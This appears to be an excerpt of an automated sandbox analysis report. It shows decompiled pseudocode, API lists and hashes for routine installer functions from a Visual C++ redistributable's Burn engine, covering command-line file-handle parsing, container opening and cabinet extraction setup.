                                                                          0x000d3b6b
                                                                          0x000d3b71
                                                                          0x000d3b74
                                                                          0x000d3b77
                                                                          0x000d3b78
                                                                          0x000d3b79
                                                                          0x000d3de3
                                                                          0x000d3de3
                                                                          0x000d3de8
                                                                          0x000d3dea
                                                                          0x000d3df0
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3b80
                                                                          0x000d3b82
                                                                          0x000d3ec3
                                                                          0x00000000
                                                                          0x000d3b88
                                                                          0x000d3b99
                                                                          0x000d3b9f
                                                                          0x000d3ba2
                                                                          0x000d3dcc
                                                                          0x000d3dcc
                                                                          0x00000000
                                                                          0x000d3ba8
                                                                          0x000d3bb8
                                                                          0x000d3bbd
                                                                          0x000d3bbf
                                                                          0x000d3bc5
                                                                          0x000d3bdf
                                                                          0x000d3be2
                                                                          0x000d3be3
                                                                          0x000d3bea
                                                                          0x000d3beb
                                                                          0x000d3bec
                                                                          0x000d3bf0
                                                                          0x000d3bf1
                                                                          0x000d3bf6
                                                                          0x000d3bf8
                                                                          0x000d3bfe
                                                                          0x00000000
                                                                          0x000d3c04
                                                                          0x000d3c04
                                                                          0x000d3c0a
                                                                          0x00000000
                                                                          0x000d3c10
                                                                          0x000d3c10
                                                                          0x000d3c12
                                                                          0x000d3eb8
                                                                          0x000d3eb9
                                                                          0x00000000
                                                                          0x000d3c18
                                                                          0x000d3c18
                                                                          0x00000000
                                                                          0x000d3c18
                                                                          0x000d3c12
                                                                          0x000d3c0a
                                                                          0x000d3bc7
                                                                          0x000d3bc7
                                                                          0x000d3bcd
                                                                          0x00000000
                                                                          0x000d3bcf
                                                                          0x000d3bcf
                                                                          0x000d3bd1
                                                                          0x000d3e96
                                                                          0x000d3e97
                                                                          0x000d3a24
                                                                          0x000d3a24
                                                                          0x000d3a25
                                                                          0x000d3bd7
                                                                          0x000d3bd7
                                                                          0x000d3c22
                                                                          0x000d3c2f
                                                                          0x000d3c31
                                                                          0x000d3c33
                                                                          0x000d3eaf
                                                                          0x00000000
                                                                          0x000d3c39
                                                                          0x000d3c39
                                                                          0x000d3c3c
                                                                          0x000d3c3f
                                                                          0x000d3c42
                                                                          0x000d3c45
                                                                          0x000d3c76
                                                                          0x000d3c76
                                                                          0x000d3c79
                                                                          0x000d3caa
                                                                          0x000d3caa
                                                                          0x000d3cad
                                                                          0x000d3cb0
                                                                          0x000d3d27
                                                                          0x000d3d27
                                                                          0x000d3d2a
                                                                          0x000d3d5a
                                                                          0x000d3d5c
                                                                          0x00000000
                                                                          0x000d3d2c
                                                                          0x000d3d2c
                                                                          0x000d3d30
                                                                          0x000d3d56
                                                                          0x000d3d56
                                                                          0x000d3d32
                                                                          0x000d3d32
                                                                          0x000d3d36
                                                                          0x00000000
                                                                          0x000d3d38
                                                                          0x000d3d3b
                                                                          0x000d3d5d
                                                                          0x000d3d5d
                                                                          0x000d3d60
                                                                          0x000d3d60
                                                                          0x000d3d36
                                                                          0x000d3d30
                                                                          0x000d3d8f
                                                                          0x000d3d97
                                                                          0x000d3da0
                                                                          0x000d3dad
                                                                          0x000d3dc2
                                                                          0x000d3dc4
                                                                          0x000d3dc6
                                                                          0x000d3ea1
                                                                          0x000d3ea2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3cb2
                                                                          0x000d3cb2
                                                                          0x000d3cd3
                                                                          0x000d3cd5
                                                                          0x000d3d40
                                                                          0x000d3d4f
                                                                          0x00000000
                                                                          0x000d3cd7
                                                                          0x000d3ce4
                                                                          0x000d3ce6
                                                                          0x00000000
                                                                          0x000d3ce8
                                                                          0x000d3ce8
                                                                          0x000d3cea
                                                                          0x000d3cec
                                                                          0x000d3cef
                                                                          0x000d3cf1
                                                                          0x000d3cf4
                                                                          0x000d3cf7
                                                                          0x000d3cf9
                                                                          0x000d3cfc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3cfe
                                                                          0x000d3cff
                                                                          0x000d3d02
                                                                          0x000d3d05
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3d07
                                                                          0x00000000
                                                                          0x000d3d05
                                                                          0x000d3d0b
                                                                          0x000d3d0b
                                                                          0x000d3d0b
                                                                          0x000d3d0c
                                                                          0x000d3d0c
                                                                          0x000d3d0f
                                                                          0x000d3d11
                                                                          0x000d3d1f
                                                                          0x000d3d1f
                                                                          0x000d3d21
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3d13
                                                                          0x000d3d13
                                                                          0x000d3d15
                                                                          0x00000000
                                                                          0x000d3d1b
                                                                          0x000d3d1b
                                                                          0x000d3d1d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3d1d
                                                                          0x000d3d15
                                                                          0x000d3d11
                                                                          0x000d3ce6
                                                                          0x000d3cd5
                                                                          0x000d3c7b
                                                                          0x000d3c7b
                                                                          0x000d3c7e
                                                                          0x000d3c96
                                                                          0x000d3c99
                                                                          0x00000000
                                                                          0x000d3c9f
                                                                          0x000d3c9f
                                                                          0x00000000
                                                                          0x000d3ca1
                                                                          0x000d3ca1
                                                                          0x000d3ca4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3ca4
                                                                          0x000d3c9f
                                                                          0x000d3c80
                                                                          0x000d3c80
                                                                          0x000d3c83
                                                                          0x00000000
                                                                          0x000d3c89
                                                                          0x000d3c89
                                                                          0x00000000
                                                                          0x000d3c8b
                                                                          0x000d3c8b
                                                                          0x000d3c8e
                                                                          0x00000000
                                                                          0x000d3c94
                                                                          0x00000000
                                                                          0x000d3c94
                                                                          0x000d3c8e
                                                                          0x000d3c89
                                                                          0x000d3c83
                                                                          0x000d3c7e
                                                                          0x000d3c47
                                                                          0x000d3c47
                                                                          0x000d3c4a
                                                                          0x000d3c62
                                                                          0x000d3c65
                                                                          0x00000000
                                                                          0x000d3c6b
                                                                          0x000d3c6b
                                                                          0x00000000
                                                                          0x000d3c6d
                                                                          0x000d3c6d
                                                                          0x000d3c70
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d3c70
                                                                          0x000d3c6b
                                                                          0x000d3c4c
                                                                          0x000d3c4c
                                                                          0x000d3c4f
                                                                          0x000d3dcf
                                                                          0x000d3dd5
                                                                          0x000d3dd8
                                                                          0x000d3dd8
                                                                          0x000d3dd9
                                                                          0x000d3dda
                                                                          0x000d3ddb
                                                                          0x000d3ddd
                                                                          0x00000000
                                                                          0x000d3c55
                                                                          0x000d3c55
                                                                          0x00000000
                                                                          0x000d3c57
                                                                          0x000d3c57
                                                                          0x000d3c5a
                                                                          0x00000000
                                                                          0x000d3c60
                                                                          0x00000000
                                                                          0x000d3c60
                                                                          0x000d3c5a
                                                                          0x000d3c55
                                                                          0x000d3c4f
                                                                          0x000d3c4a
                                                                          0x000d3c45
                                                                          0x000d3c33
                                                                          0x000d3bd1
                                                                          0x000d3bcd
                                                                          0x000d3bc5
                                                                          0x000d3ba2
                                                                          0x00000000
                                                                          0x000d3b82
                                                                          0x000d3df6
                                                                          0x000d3df9
                                                                          0x000d3dfe
                                                                          0x000d3dff
                                                                          0x000d3e02
                                                                          0x000d3e05
                                                                          0x000d3e08
                                                                          0x000d3e08
                                                                          0x00000000
                                                                          0x000d3b63
                                                                          0x000d39ef
                                                                          0x000d39ef
                                                                          0x000d39f0
                                                                          0x000d39f5
                                                                          0x000d39f5
                                                                          0x000d39fa
                                                                          0x000d39ff
                                                                          0x000d3f63
                                                                          0x000d3f63
                                                                          0x000d3f64
                                                                          0x000d3f6a
                                                                          0x000d393d
                                                                          0x000d393d
                                                                          0x000d393f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000d393f
                                                                          0x000d393b
                                                                          0x000d3906
                                                                          0x000d3906
                                                                          0x000d390c
                                                                          0x000d3915
                                                                          0x000d391a
                                                                          0x000d3904
                                                                          0x000d3f6b
                                                                          0x000d3f72
                                                                          0x000d3f7a
                                                                          0x000d3f7a
                                                                          0x000d3f83
                                                                          0x000d3f88
                                                                          0x000d3f88
                                                                          0x000d3f91
                                                                          0x000d3f96
                                                                          0x000d3f96
                                                                          0x000d3f9f
                                                                          0x000d3fa4
                                                                          0x000d3fa4
                                                                          0x000d3fbb

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen
                                                                          • String ID: Failed to convert version: %ls to DWORD64 for ProductCode: %ls$Failed to copy the installed ProductCode to the package.$Failed to enum related products.$Failed to get product information for ProductCode: %ls$Failed to get version for product in machine context: %ls$Failed to get version for product in user unmanaged context: %ls$Failed to query feature state.$Invalid state value.$Language$UX aborted detect compatible MSI package.$UX aborted detect related MSI package.$UX aborted detect.$VersionString$msasn1.dll$msiuser.cpp
                                                                          • API String ID: 1659193697-2574767977
                                                                          • Opcode ID: 9bdd98bebc52c0bd7caf342f36e201f23b9788bf90ba70689ed51251b40db33b
                                                                          • Instruction ID: c3bba37a6198fdbe16e3e320d326d0dedea8c8f422ee38f304b5390b138a5ece
                                                                          • Opcode Fuzzy Hash: 9bdd98bebc52c0bd7caf342f36e201f23b9788bf90ba70689ed51251b40db33b
                                                                          • Instruction Fuzzy Hash: FE227F71A00719AFDB249FA4CC85FADB7B9FF04710F10412AE605AB292D771AE50DF62
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B41D2 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 66%
                                                                          			E000B41D2(void* __ecx, union _LARGE_INTEGER* __edx, void* __eflags, struct _CRITICAL_SECTION* _a4, signed int _a8) {
				char _v8;
				void* _t50;
				int _t55;
				WCHAR* _t56;
				int _t62;
				WCHAR* _t63;
				signed int _t69;
				intOrPtr* _t72;
				signed int _t76;
				struct _CRITICAL_SECTION* _t79;
				signed int _t83;
				void* _t89;
				void* _t93;
				union _LARGE_INTEGER* _t96;
				struct _CRITICAL_SECTION* _t98;
				void* _t100;
				void* _t103;

				_t96 = __edx;
				_push(__ecx);
				_a8 = _a8 | 0xffffffff;
				_t98 = _a4;
				_v8 = _a8;
				 *(_t98 + 0x498) =  *(_t98 + 0x498) | 0xffffffff;
				 *(_t98 + 0x494) = 1;
				InitializeCriticalSection(_t98);
				_t9 = _t98 + 0xd0; // 0xd0
				InitializeCriticalSection(_t9);
				_t10 = _t98 + 0x4a0; // 0x4a0
				E000C4B0E(_t10);
				_t11 = _t98 + 0x4b8; // 0x4b8
				E000C4B0E(_t11);
				_t83 = 0;
				if( *((intOrPtr*)(_t98 + 0x4dc)) <= 0) {
					L14:
					_t40 = _t98 + 0x48; // 0x48
					_t50 = E000BB389(_t96, _t40, _v8, _a8); // executed
					_t103 = _t50;
					if(_t103 < 0) {
						_push("Failed to initialize engine section.");
						_push(_t103);
						E000F012F();
					}
					L16:
					return _t103;
				}
				do {
					if( *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)))) != 0x2d) {
						goto L13;
					}
					_t55 = lstrlenW(L"burn.filehandle.attached");
					_t56 = L"burn.filehandle.attached";
					if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t56), _t56, _t55) != 2) {
						L8:
						_t62 = lstrlenW(L"burn.filehandle.self");
						_t63 = L"burn.filehandle.self";
						if(CompareStringW(0x7f, 1,  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 2, lstrlenW(_t63), _t63, _t62) != 2) {
							goto L13;
						}
						_t69 = lstrlenW(L"burn.filehandle.self");
						_t72 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t69 * 2;
						_t89 = 0x3d;
						_a4 = _t72;
						if(_t89 !=  *((intOrPtr*)(_t72 - 2)) || 0 ==  *_t72) {
							_t100 = 0x80070057;
							E000B37D3(_t72, "engine.cpp", 0x140, 0x80070057);
							_push(L"burn.filehandle.self");
							L19:
							_push("Missing required parameter for switch: %ls");
							_t103 = _t100;
							_push(_t100);
							goto L20;
						} else {
							_t103 = E000B29DC( &_v8, _t96, _t72, 0,  &_v8);
							if(_t103 < 0) {
								L17:
								_push(_a4);
								_push("Failed to parse file handle: \'%ls\'");
								_push(_t103);
								L20:
								E000F012F();
								goto L16;
							}
							goto L13;
						}
					}
					_t76 = lstrlenW(L"burn.filehandle.attached");
					_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0x4e0)) + _t83 * 4)) + 4 + _t76 * 2;
					_t93 = 0x3d;
					_a4 = _t79;
					if(_t93 !=  *((intOrPtr*)(_t79 - 2)) || 0 ==  *_t79) {
						_t100 = 0x80070057;
						E000B37D3(_t79, "engine.cpp", 0x135, 0x80070057);
						_push(L"burn.filehandle.attached");
						goto L19;
					} else {
						_t103 = E000B29DC( &_a8, _t96, _t79, 0,  &_a8);
						if(_t103 < 0) {
							goto L17;
						}
						goto L8;
					}
					L13:
					_t83 = _t83 + 1;
				} while (_t83 <  *((intOrPtr*)(_t98 + 0x4dc)));
				goto L14;
			}




















                                                                          0x000b41d2
                                                                          0x000b41d5
                                                                          0x000b41d9
                                                                          0x000b41e6
                                                                          0x000b41ea
                                                                          0x000b41ed
                                                                          0x000b41f4
                                                                          0x000b41fe
                                                                          0x000b4200
                                                                          0x000b4207
                                                                          0x000b4209
                                                                          0x000b4210
                                                                          0x000b4215
                                                                          0x000b421c
                                                                          0x000b4221
                                                                          0x000b4229
                                                                          0x000b434d
                                                                          0x000b4350
                                                                          0x000b4357
                                                                          0x000b435c
                                                                          0x000b4360
                                                                          0x000b4362
                                                                          0x000b4367
                                                                          0x000b4368
                                                                          0x000b436e
                                                                          0x000b436f
                                                                          0x000b4377
                                                                          0x000b4377
                                                                          0x000b4235
                                                                          0x000b4242
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b424d
                                                                          0x000b4250
                                                                          0x000b4274
                                                                          0x000b42c6
                                                                          0x000b42cb
                                                                          0x000b42ce
                                                                          0x000b42f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b42f9
                                                                          0x000b430d
                                                                          0x000b430f
                                                                          0x000b4310
                                                                          0x000b4317
                                                                          0x000b43b1
                                                                          0x000b43c1
                                                                          0x000b43c6
                                                                          0x000b439f
                                                                          0x000b439f
                                                                          0x000b43a4
                                                                          0x000b43a6
                                                                          0x00000000
                                                                          0x000b4328
                                                                          0x000b4334
                                                                          0x000b4338
                                                                          0x000b437a
                                                                          0x000b437a
                                                                          0x000b437d
                                                                          0x000b4382
                                                                          0x000b43a7
                                                                          0x000b43a7
                                                                          0x00000000
                                                                          0x000b43ac
                                                                          0x00000000
                                                                          0x000b433a
                                                                          0x000b4317
                                                                          0x000b427b
                                                                          0x000b428f
                                                                          0x000b4291
                                                                          0x000b4292
                                                                          0x000b4299
                                                                          0x000b4385
                                                                          0x000b4395
                                                                          0x000b439a
                                                                          0x00000000
                                                                          0x000b42aa
                                                                          0x000b42b6
                                                                          0x000b42ba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b42c0
                                                                          0x000b4340
                                                                          0x000b4340
                                                                          0x000b4341
                                                                          0x00000000

                                                                          APIs
                                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B41FE
                                                                          • InitializeCriticalSection.KERNEL32(000000D0,?,?,000B515E,?,?,00000000,?,?), ref: 000B4207
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,000B515E,?,?,00000000,?,?), ref: 000B424D
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B4257
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B426B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,000B515E,?,?,00000000,?,?), ref: 000B427B
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,000B515E,?,?,00000000,?,?), ref: 000B42CB
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B42D5
                                                                          • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,000B515E,?,?,00000000,?,?), ref: 000B42E9
                                                                          • lstrlenW.KERNEL32(burn.filehandle.self,?,?,000B515E,?,?,00000000,?,?), ref: 000B42F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                          • String ID: Failed to initialize user section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$user.cpp
                                                                          • API String ID: 3039292287-3209860532
                                                                          • Opcode ID: 7b6c39894c2b8be3d5bfe1eee88fac9d0ba64f5ae1526379a96fff8094fedbce
                                                                          • Instruction ID: c79efd5d80b72f77b1d3decae2334a1274955f99a4029612b6d2a55d7a88f5cf
                                                                          • Opcode Fuzzy Hash: 7b6c39894c2b8be3d5bfe1eee88fac9d0ba64f5ae1526379a96fff8094fedbce
                                                                          • Instruction Fuzzy Hash: 5A51A571A40219BFD7249B69DC46FFE77A8FB04B60F040115F718DB291DB70AA50DBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000BC129 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 128fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 54%
                                                                          			E000BC129(HANDLE* _a4, intOrPtr _a8, void* _a12, WCHAR* _a16) {
				void* _t29;
				int _t31;
				union _LARGE_INTEGER* _t33;
				int _t34;
				long _t38;
				signed short _t40;
				signed short _t43;
				void* _t47;
				signed short _t48;
				HANDLE* _t51;
				intOrPtr _t52;
				long _t55;
				union _LARGE_INTEGER _t65;

				_t52 = _a8;
				_t51 = _a4;
				_t51[6] =  *(_t52 + 4);
				_t55 = 0;
				_t65 = 0;
				_t51[4] =  *(_t52 + 0x18);
				_t51[5] =  *(_t52 + 0x1c);
				_t51[2] =  *(_t52 + 0x40);
				_t51[3] =  *(_t52 + 0x44);
				if(_a12 != 0xffffffff) {
					_t29 = GetCurrentProcess();
					_t31 = DuplicateHandle(GetCurrentProcess(), _a12, _t29, _t51, 0, 0, 2); // executed
					if(_t31 != 0) {
						_t65 = 0;
						goto L7;
					} else {
						_t43 = GetLastError();
						_t61 =  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
						_t55 =  >=  ? 0x80004005 :  <=  ? _t43 : _t43 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "container.cpp", 0xec, _t55);
						_push(_a16);
						_push("Failed to duplicate handle to container: %ls");
						goto L3;
					}
				} else {
					_t47 = CreateFileW(_a16, 0x80000000, 1, 0, 3, 0x8000080, 0);
					 *_t51 = _t47;
					if(_t47 != 0xffffffff) {
						L7:
						if( *((intOrPtr*)(_a8 + 0xc)) == _t55) {
							_t33 = _t55;
						} else {
							_t65 = _t51[2];
							_t33 = _t51[3];
						}
						_push(_t55);
						_t34 = SetFilePointerEx( *_t51, _t65, _t33, _t55); // executed
						if(_t34 != 0) {
							if(_t51[6] == 1) {
								_t38 = E000D1484(_t51, _a16); // executed
								_t55 = _t38;
								if(_t55 < 0) {
									_push("Failed to open container.");
									goto L15;
								}
							}
						} else {
							_t40 = GetLastError();
							_t58 =  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							_t55 =  >=  ? 0x80004005 :  <=  ? _t40 : _t40 & 0x0000ffff | 0x80070000;
							E000B37D3(0x80004005, "container.cpp", 0xf8, _t55);
							_push("Failed to move file pointer to container offset.");
							L15:
							_push(_t55);
							E000F012F();
						}
					} else {
						_t48 = GetLastError();
						_t64 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						_t55 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "container.cpp", 0xe6, _t55);
						_push(_a16);
						_push("Failed to open file: %ls");
						L3:
						_push(_t55);
						E000F012F();
					}
				}
				return _t55;
			}
















                                                                          0x000bc12c
                                                                          0x000bc130
                                                                          0x000bc138
                                                                          0x000bc13b
                                                                          0x000bc141
                                                                          0x000bc146
                                                                          0x000bc14c
                                                                          0x000bc152
                                                                          0x000bc158
                                                                          0x000bc15b
                                                                          0x000bc1d0
                                                                          0x000bc1d9
                                                                          0x000bc1e1
                                                                          0x000bc21b
                                                                          0x00000000
                                                                          0x000bc1e3
                                                                          0x000bc1e3
                                                                          0x000bc1f4
                                                                          0x000bc1fe
                                                                          0x000bc20c
                                                                          0x000bc211
                                                                          0x000bc214
                                                                          0x00000000
                                                                          0x000bc214
                                                                          0x000bc15d
                                                                          0x000bc170
                                                                          0x000bc176
                                                                          0x000bc17b
                                                                          0x000bc21d
                                                                          0x000bc223
                                                                          0x000bc22d
                                                                          0x000bc225
                                                                          0x000bc225
                                                                          0x000bc228
                                                                          0x000bc228
                                                                          0x000bc22f
                                                                          0x000bc235
                                                                          0x000bc23d
                                                                          0x000bc27a
                                                                          0x000bc280
                                                                          0x000bc285
                                                                          0x000bc289
                                                                          0x000bc28b
                                                                          0x00000000
                                                                          0x000bc28b
                                                                          0x000bc289
                                                                          0x000bc23f
                                                                          0x000bc23f
                                                                          0x000bc250
                                                                          0x000bc25a
                                                                          0x000bc268
                                                                          0x000bc26d
                                                                          0x000bc290
                                                                          0x000bc290
                                                                          0x000bc291
                                                                          0x000bc297
                                                                          0x000bc181
                                                                          0x000bc181
                                                                          0x000bc192
                                                                          0x000bc19c
                                                                          0x000bc1aa
                                                                          0x000bc1af
                                                                          0x000bc1b2
                                                                          0x000bc1b7
                                                                          0x000bc1b7
                                                                          0x000bc1b8
                                                                          0x000bc1bd
                                                                          0x000bc17b
                                                                          0x000bc29e

                                                                          APIs
                                                                          • CreateFileW.KERNEL32(000DAB22,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,?,?,000DAB22), ref: 000BC170
                                                                          • GetLastError.KERNEL32(?,000DAB22), ref: 000BC181
                                                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00000000,?,?,000DAB22), ref: 000BC1D0
                                                                          • GetCurrentProcess.KERNEL32(000000FF,00000000,?,000DAB22), ref: 000BC1D6
                                                                          • DuplicateHandle.KERNELBASE(00000000,?,000DAB22), ref: 000BC1D9
                                                                          • GetLastError.KERNEL32(?,000DAB22), ref: 000BC1E3
                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000DAB22), ref: 000BC235
                                                                          • GetLastError.KERNEL32(?,000DAB22), ref: 000BC23F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                          • String ID: @Met$Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp
                                                                          • API String ID: 2619879409-1851430804
                                                                          • Opcode ID: cfdfc7e650af232ca62602047b803a9b54aaba33219f48e937fb1f98e066ed79
                                                                          • Instruction ID: a8e97f2f98397e0ec9292235ab1f6f94ecaefc4fd86b5d48ca886c8725dbfb2f
                                                                          • Opcode Fuzzy Hash: cfdfc7e650af232ca62602047b803a9b54aaba33219f48e937fb1f98e066ed79
                                                                          • Instruction Fuzzy Hash: B6418372240305ABEB209F69DC45EA73BE9EF85750F114129FE18EB292DA71D811DB60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000D1484 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E000D1484(void* _a4, intOrPtr _a8) {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t29;
				void* _t30;

				_t29 = _a4;
				 *(_t29 + 0x3c) =  *(_t29 + 0x3c) | 0xffffffff;
				_t5 = _t29 + 0x1c; // 0x1c
				_t30 = E000B21A5(_t5, _a8, 0);
				if(_t30 >= 0) {
					_t11 = CreateEventW(0, 1, 0, 0);
					 *(_t29 + 0x24) = _t11;
					if(_t11 != 0) {
						_t12 = CreateEventW(0, 1, 0, 0);
						 *(_t29 + 0x28) = _t12;
						if(_t12 != 0) {
							_t13 = CreateThread(0, 0, E000D0E43, _t29, 0, 0); // executed
							 *(_t29 + 0x20) = _t13;
							if(_t13 != 0) {
								_t30 = E000D1224(_t29);
								if(_t30 < 0) {
									_push("Failed to wait for operation complete.");
									goto L10;
								}
							} else {
								_t34 =  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
								_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t17 & 0x0000ffff | 0x80070000;
								E000B37D3(0x80004005, "cabextract.cpp", 0x93, _t30);
								_push("Failed to create extraction thread.");
								goto L10;
							}
						} else {
							_t37 =  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
							_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t20 & 0x0000ffff | 0x80070000;
							E000B37D3(0x80004005, "cabextract.cpp", 0x8f, _t30);
							_push("Failed to create operation complete event.");
							goto L10;
						}
					} else {
						_t40 =  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						_t30 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t23 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "cabextract.cpp", 0x8c, _t30);
						_push("Failed to create begin operation event.");
						goto L10;
					}
				} else {
					_push("Failed to copy file name.");
					L10:
					_push(_t30);
					E000F012F();
				}
				return _t30;
			}








                                                                          0x000d148a
                                                                          0x000d1493
                                                                          0x000d1497
                                                                          0x000d14a0
                                                                          0x000d14a4
                                                                          0x000d14bb
                                                                          0x000d14bd
                                                                          0x000d14c2
                                                                          0x000d1501
                                                                          0x000d1503
                                                                          0x000d1508
                                                                          0x000d1549
                                                                          0x000d154f
                                                                          0x000d1554
                                                                          0x000d1591
                                                                          0x000d1595
                                                                          0x000d1597
                                                                          0x00000000
                                                                          0x000d1597
                                                                          0x000d1556
                                                                          0x000d1567
                                                                          0x000d1571
                                                                          0x000d157f
                                                                          0x000d1584
                                                                          0x00000000
                                                                          0x000d1584
                                                                          0x000d150a
                                                                          0x000d151b
                                                                          0x000d1525
                                                                          0x000d1533
                                                                          0x000d1538
                                                                          0x00000000
                                                                          0x000d1538
                                                                          0x000d14c4
                                                                          0x000d14d5
                                                                          0x000d14df
                                                                          0x000d14ed
                                                                          0x000d14f2
                                                                          0x00000000
                                                                          0x000d14f2
                                                                          0x000d14a6
                                                                          0x000d14a6
                                                                          0x000d159c
                                                                          0x000d159c
                                                                          0x000d159d
                                                                          0x000d15a3
                                                                          0x000d15aa

                                                                          APIs
                                                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,0000001C,?,00000000,00000000,00000000,00000000,?,000BC285,00000000,000DAB22,?,000DAB22), ref: 000D14BB
                                                                          • GetLastError.KERNEL32(?,000BC285,00000000,000DAB22,?,000DAB22), ref: 000D14C4
                                                                          Strings
                                                                          Memory Dump Source
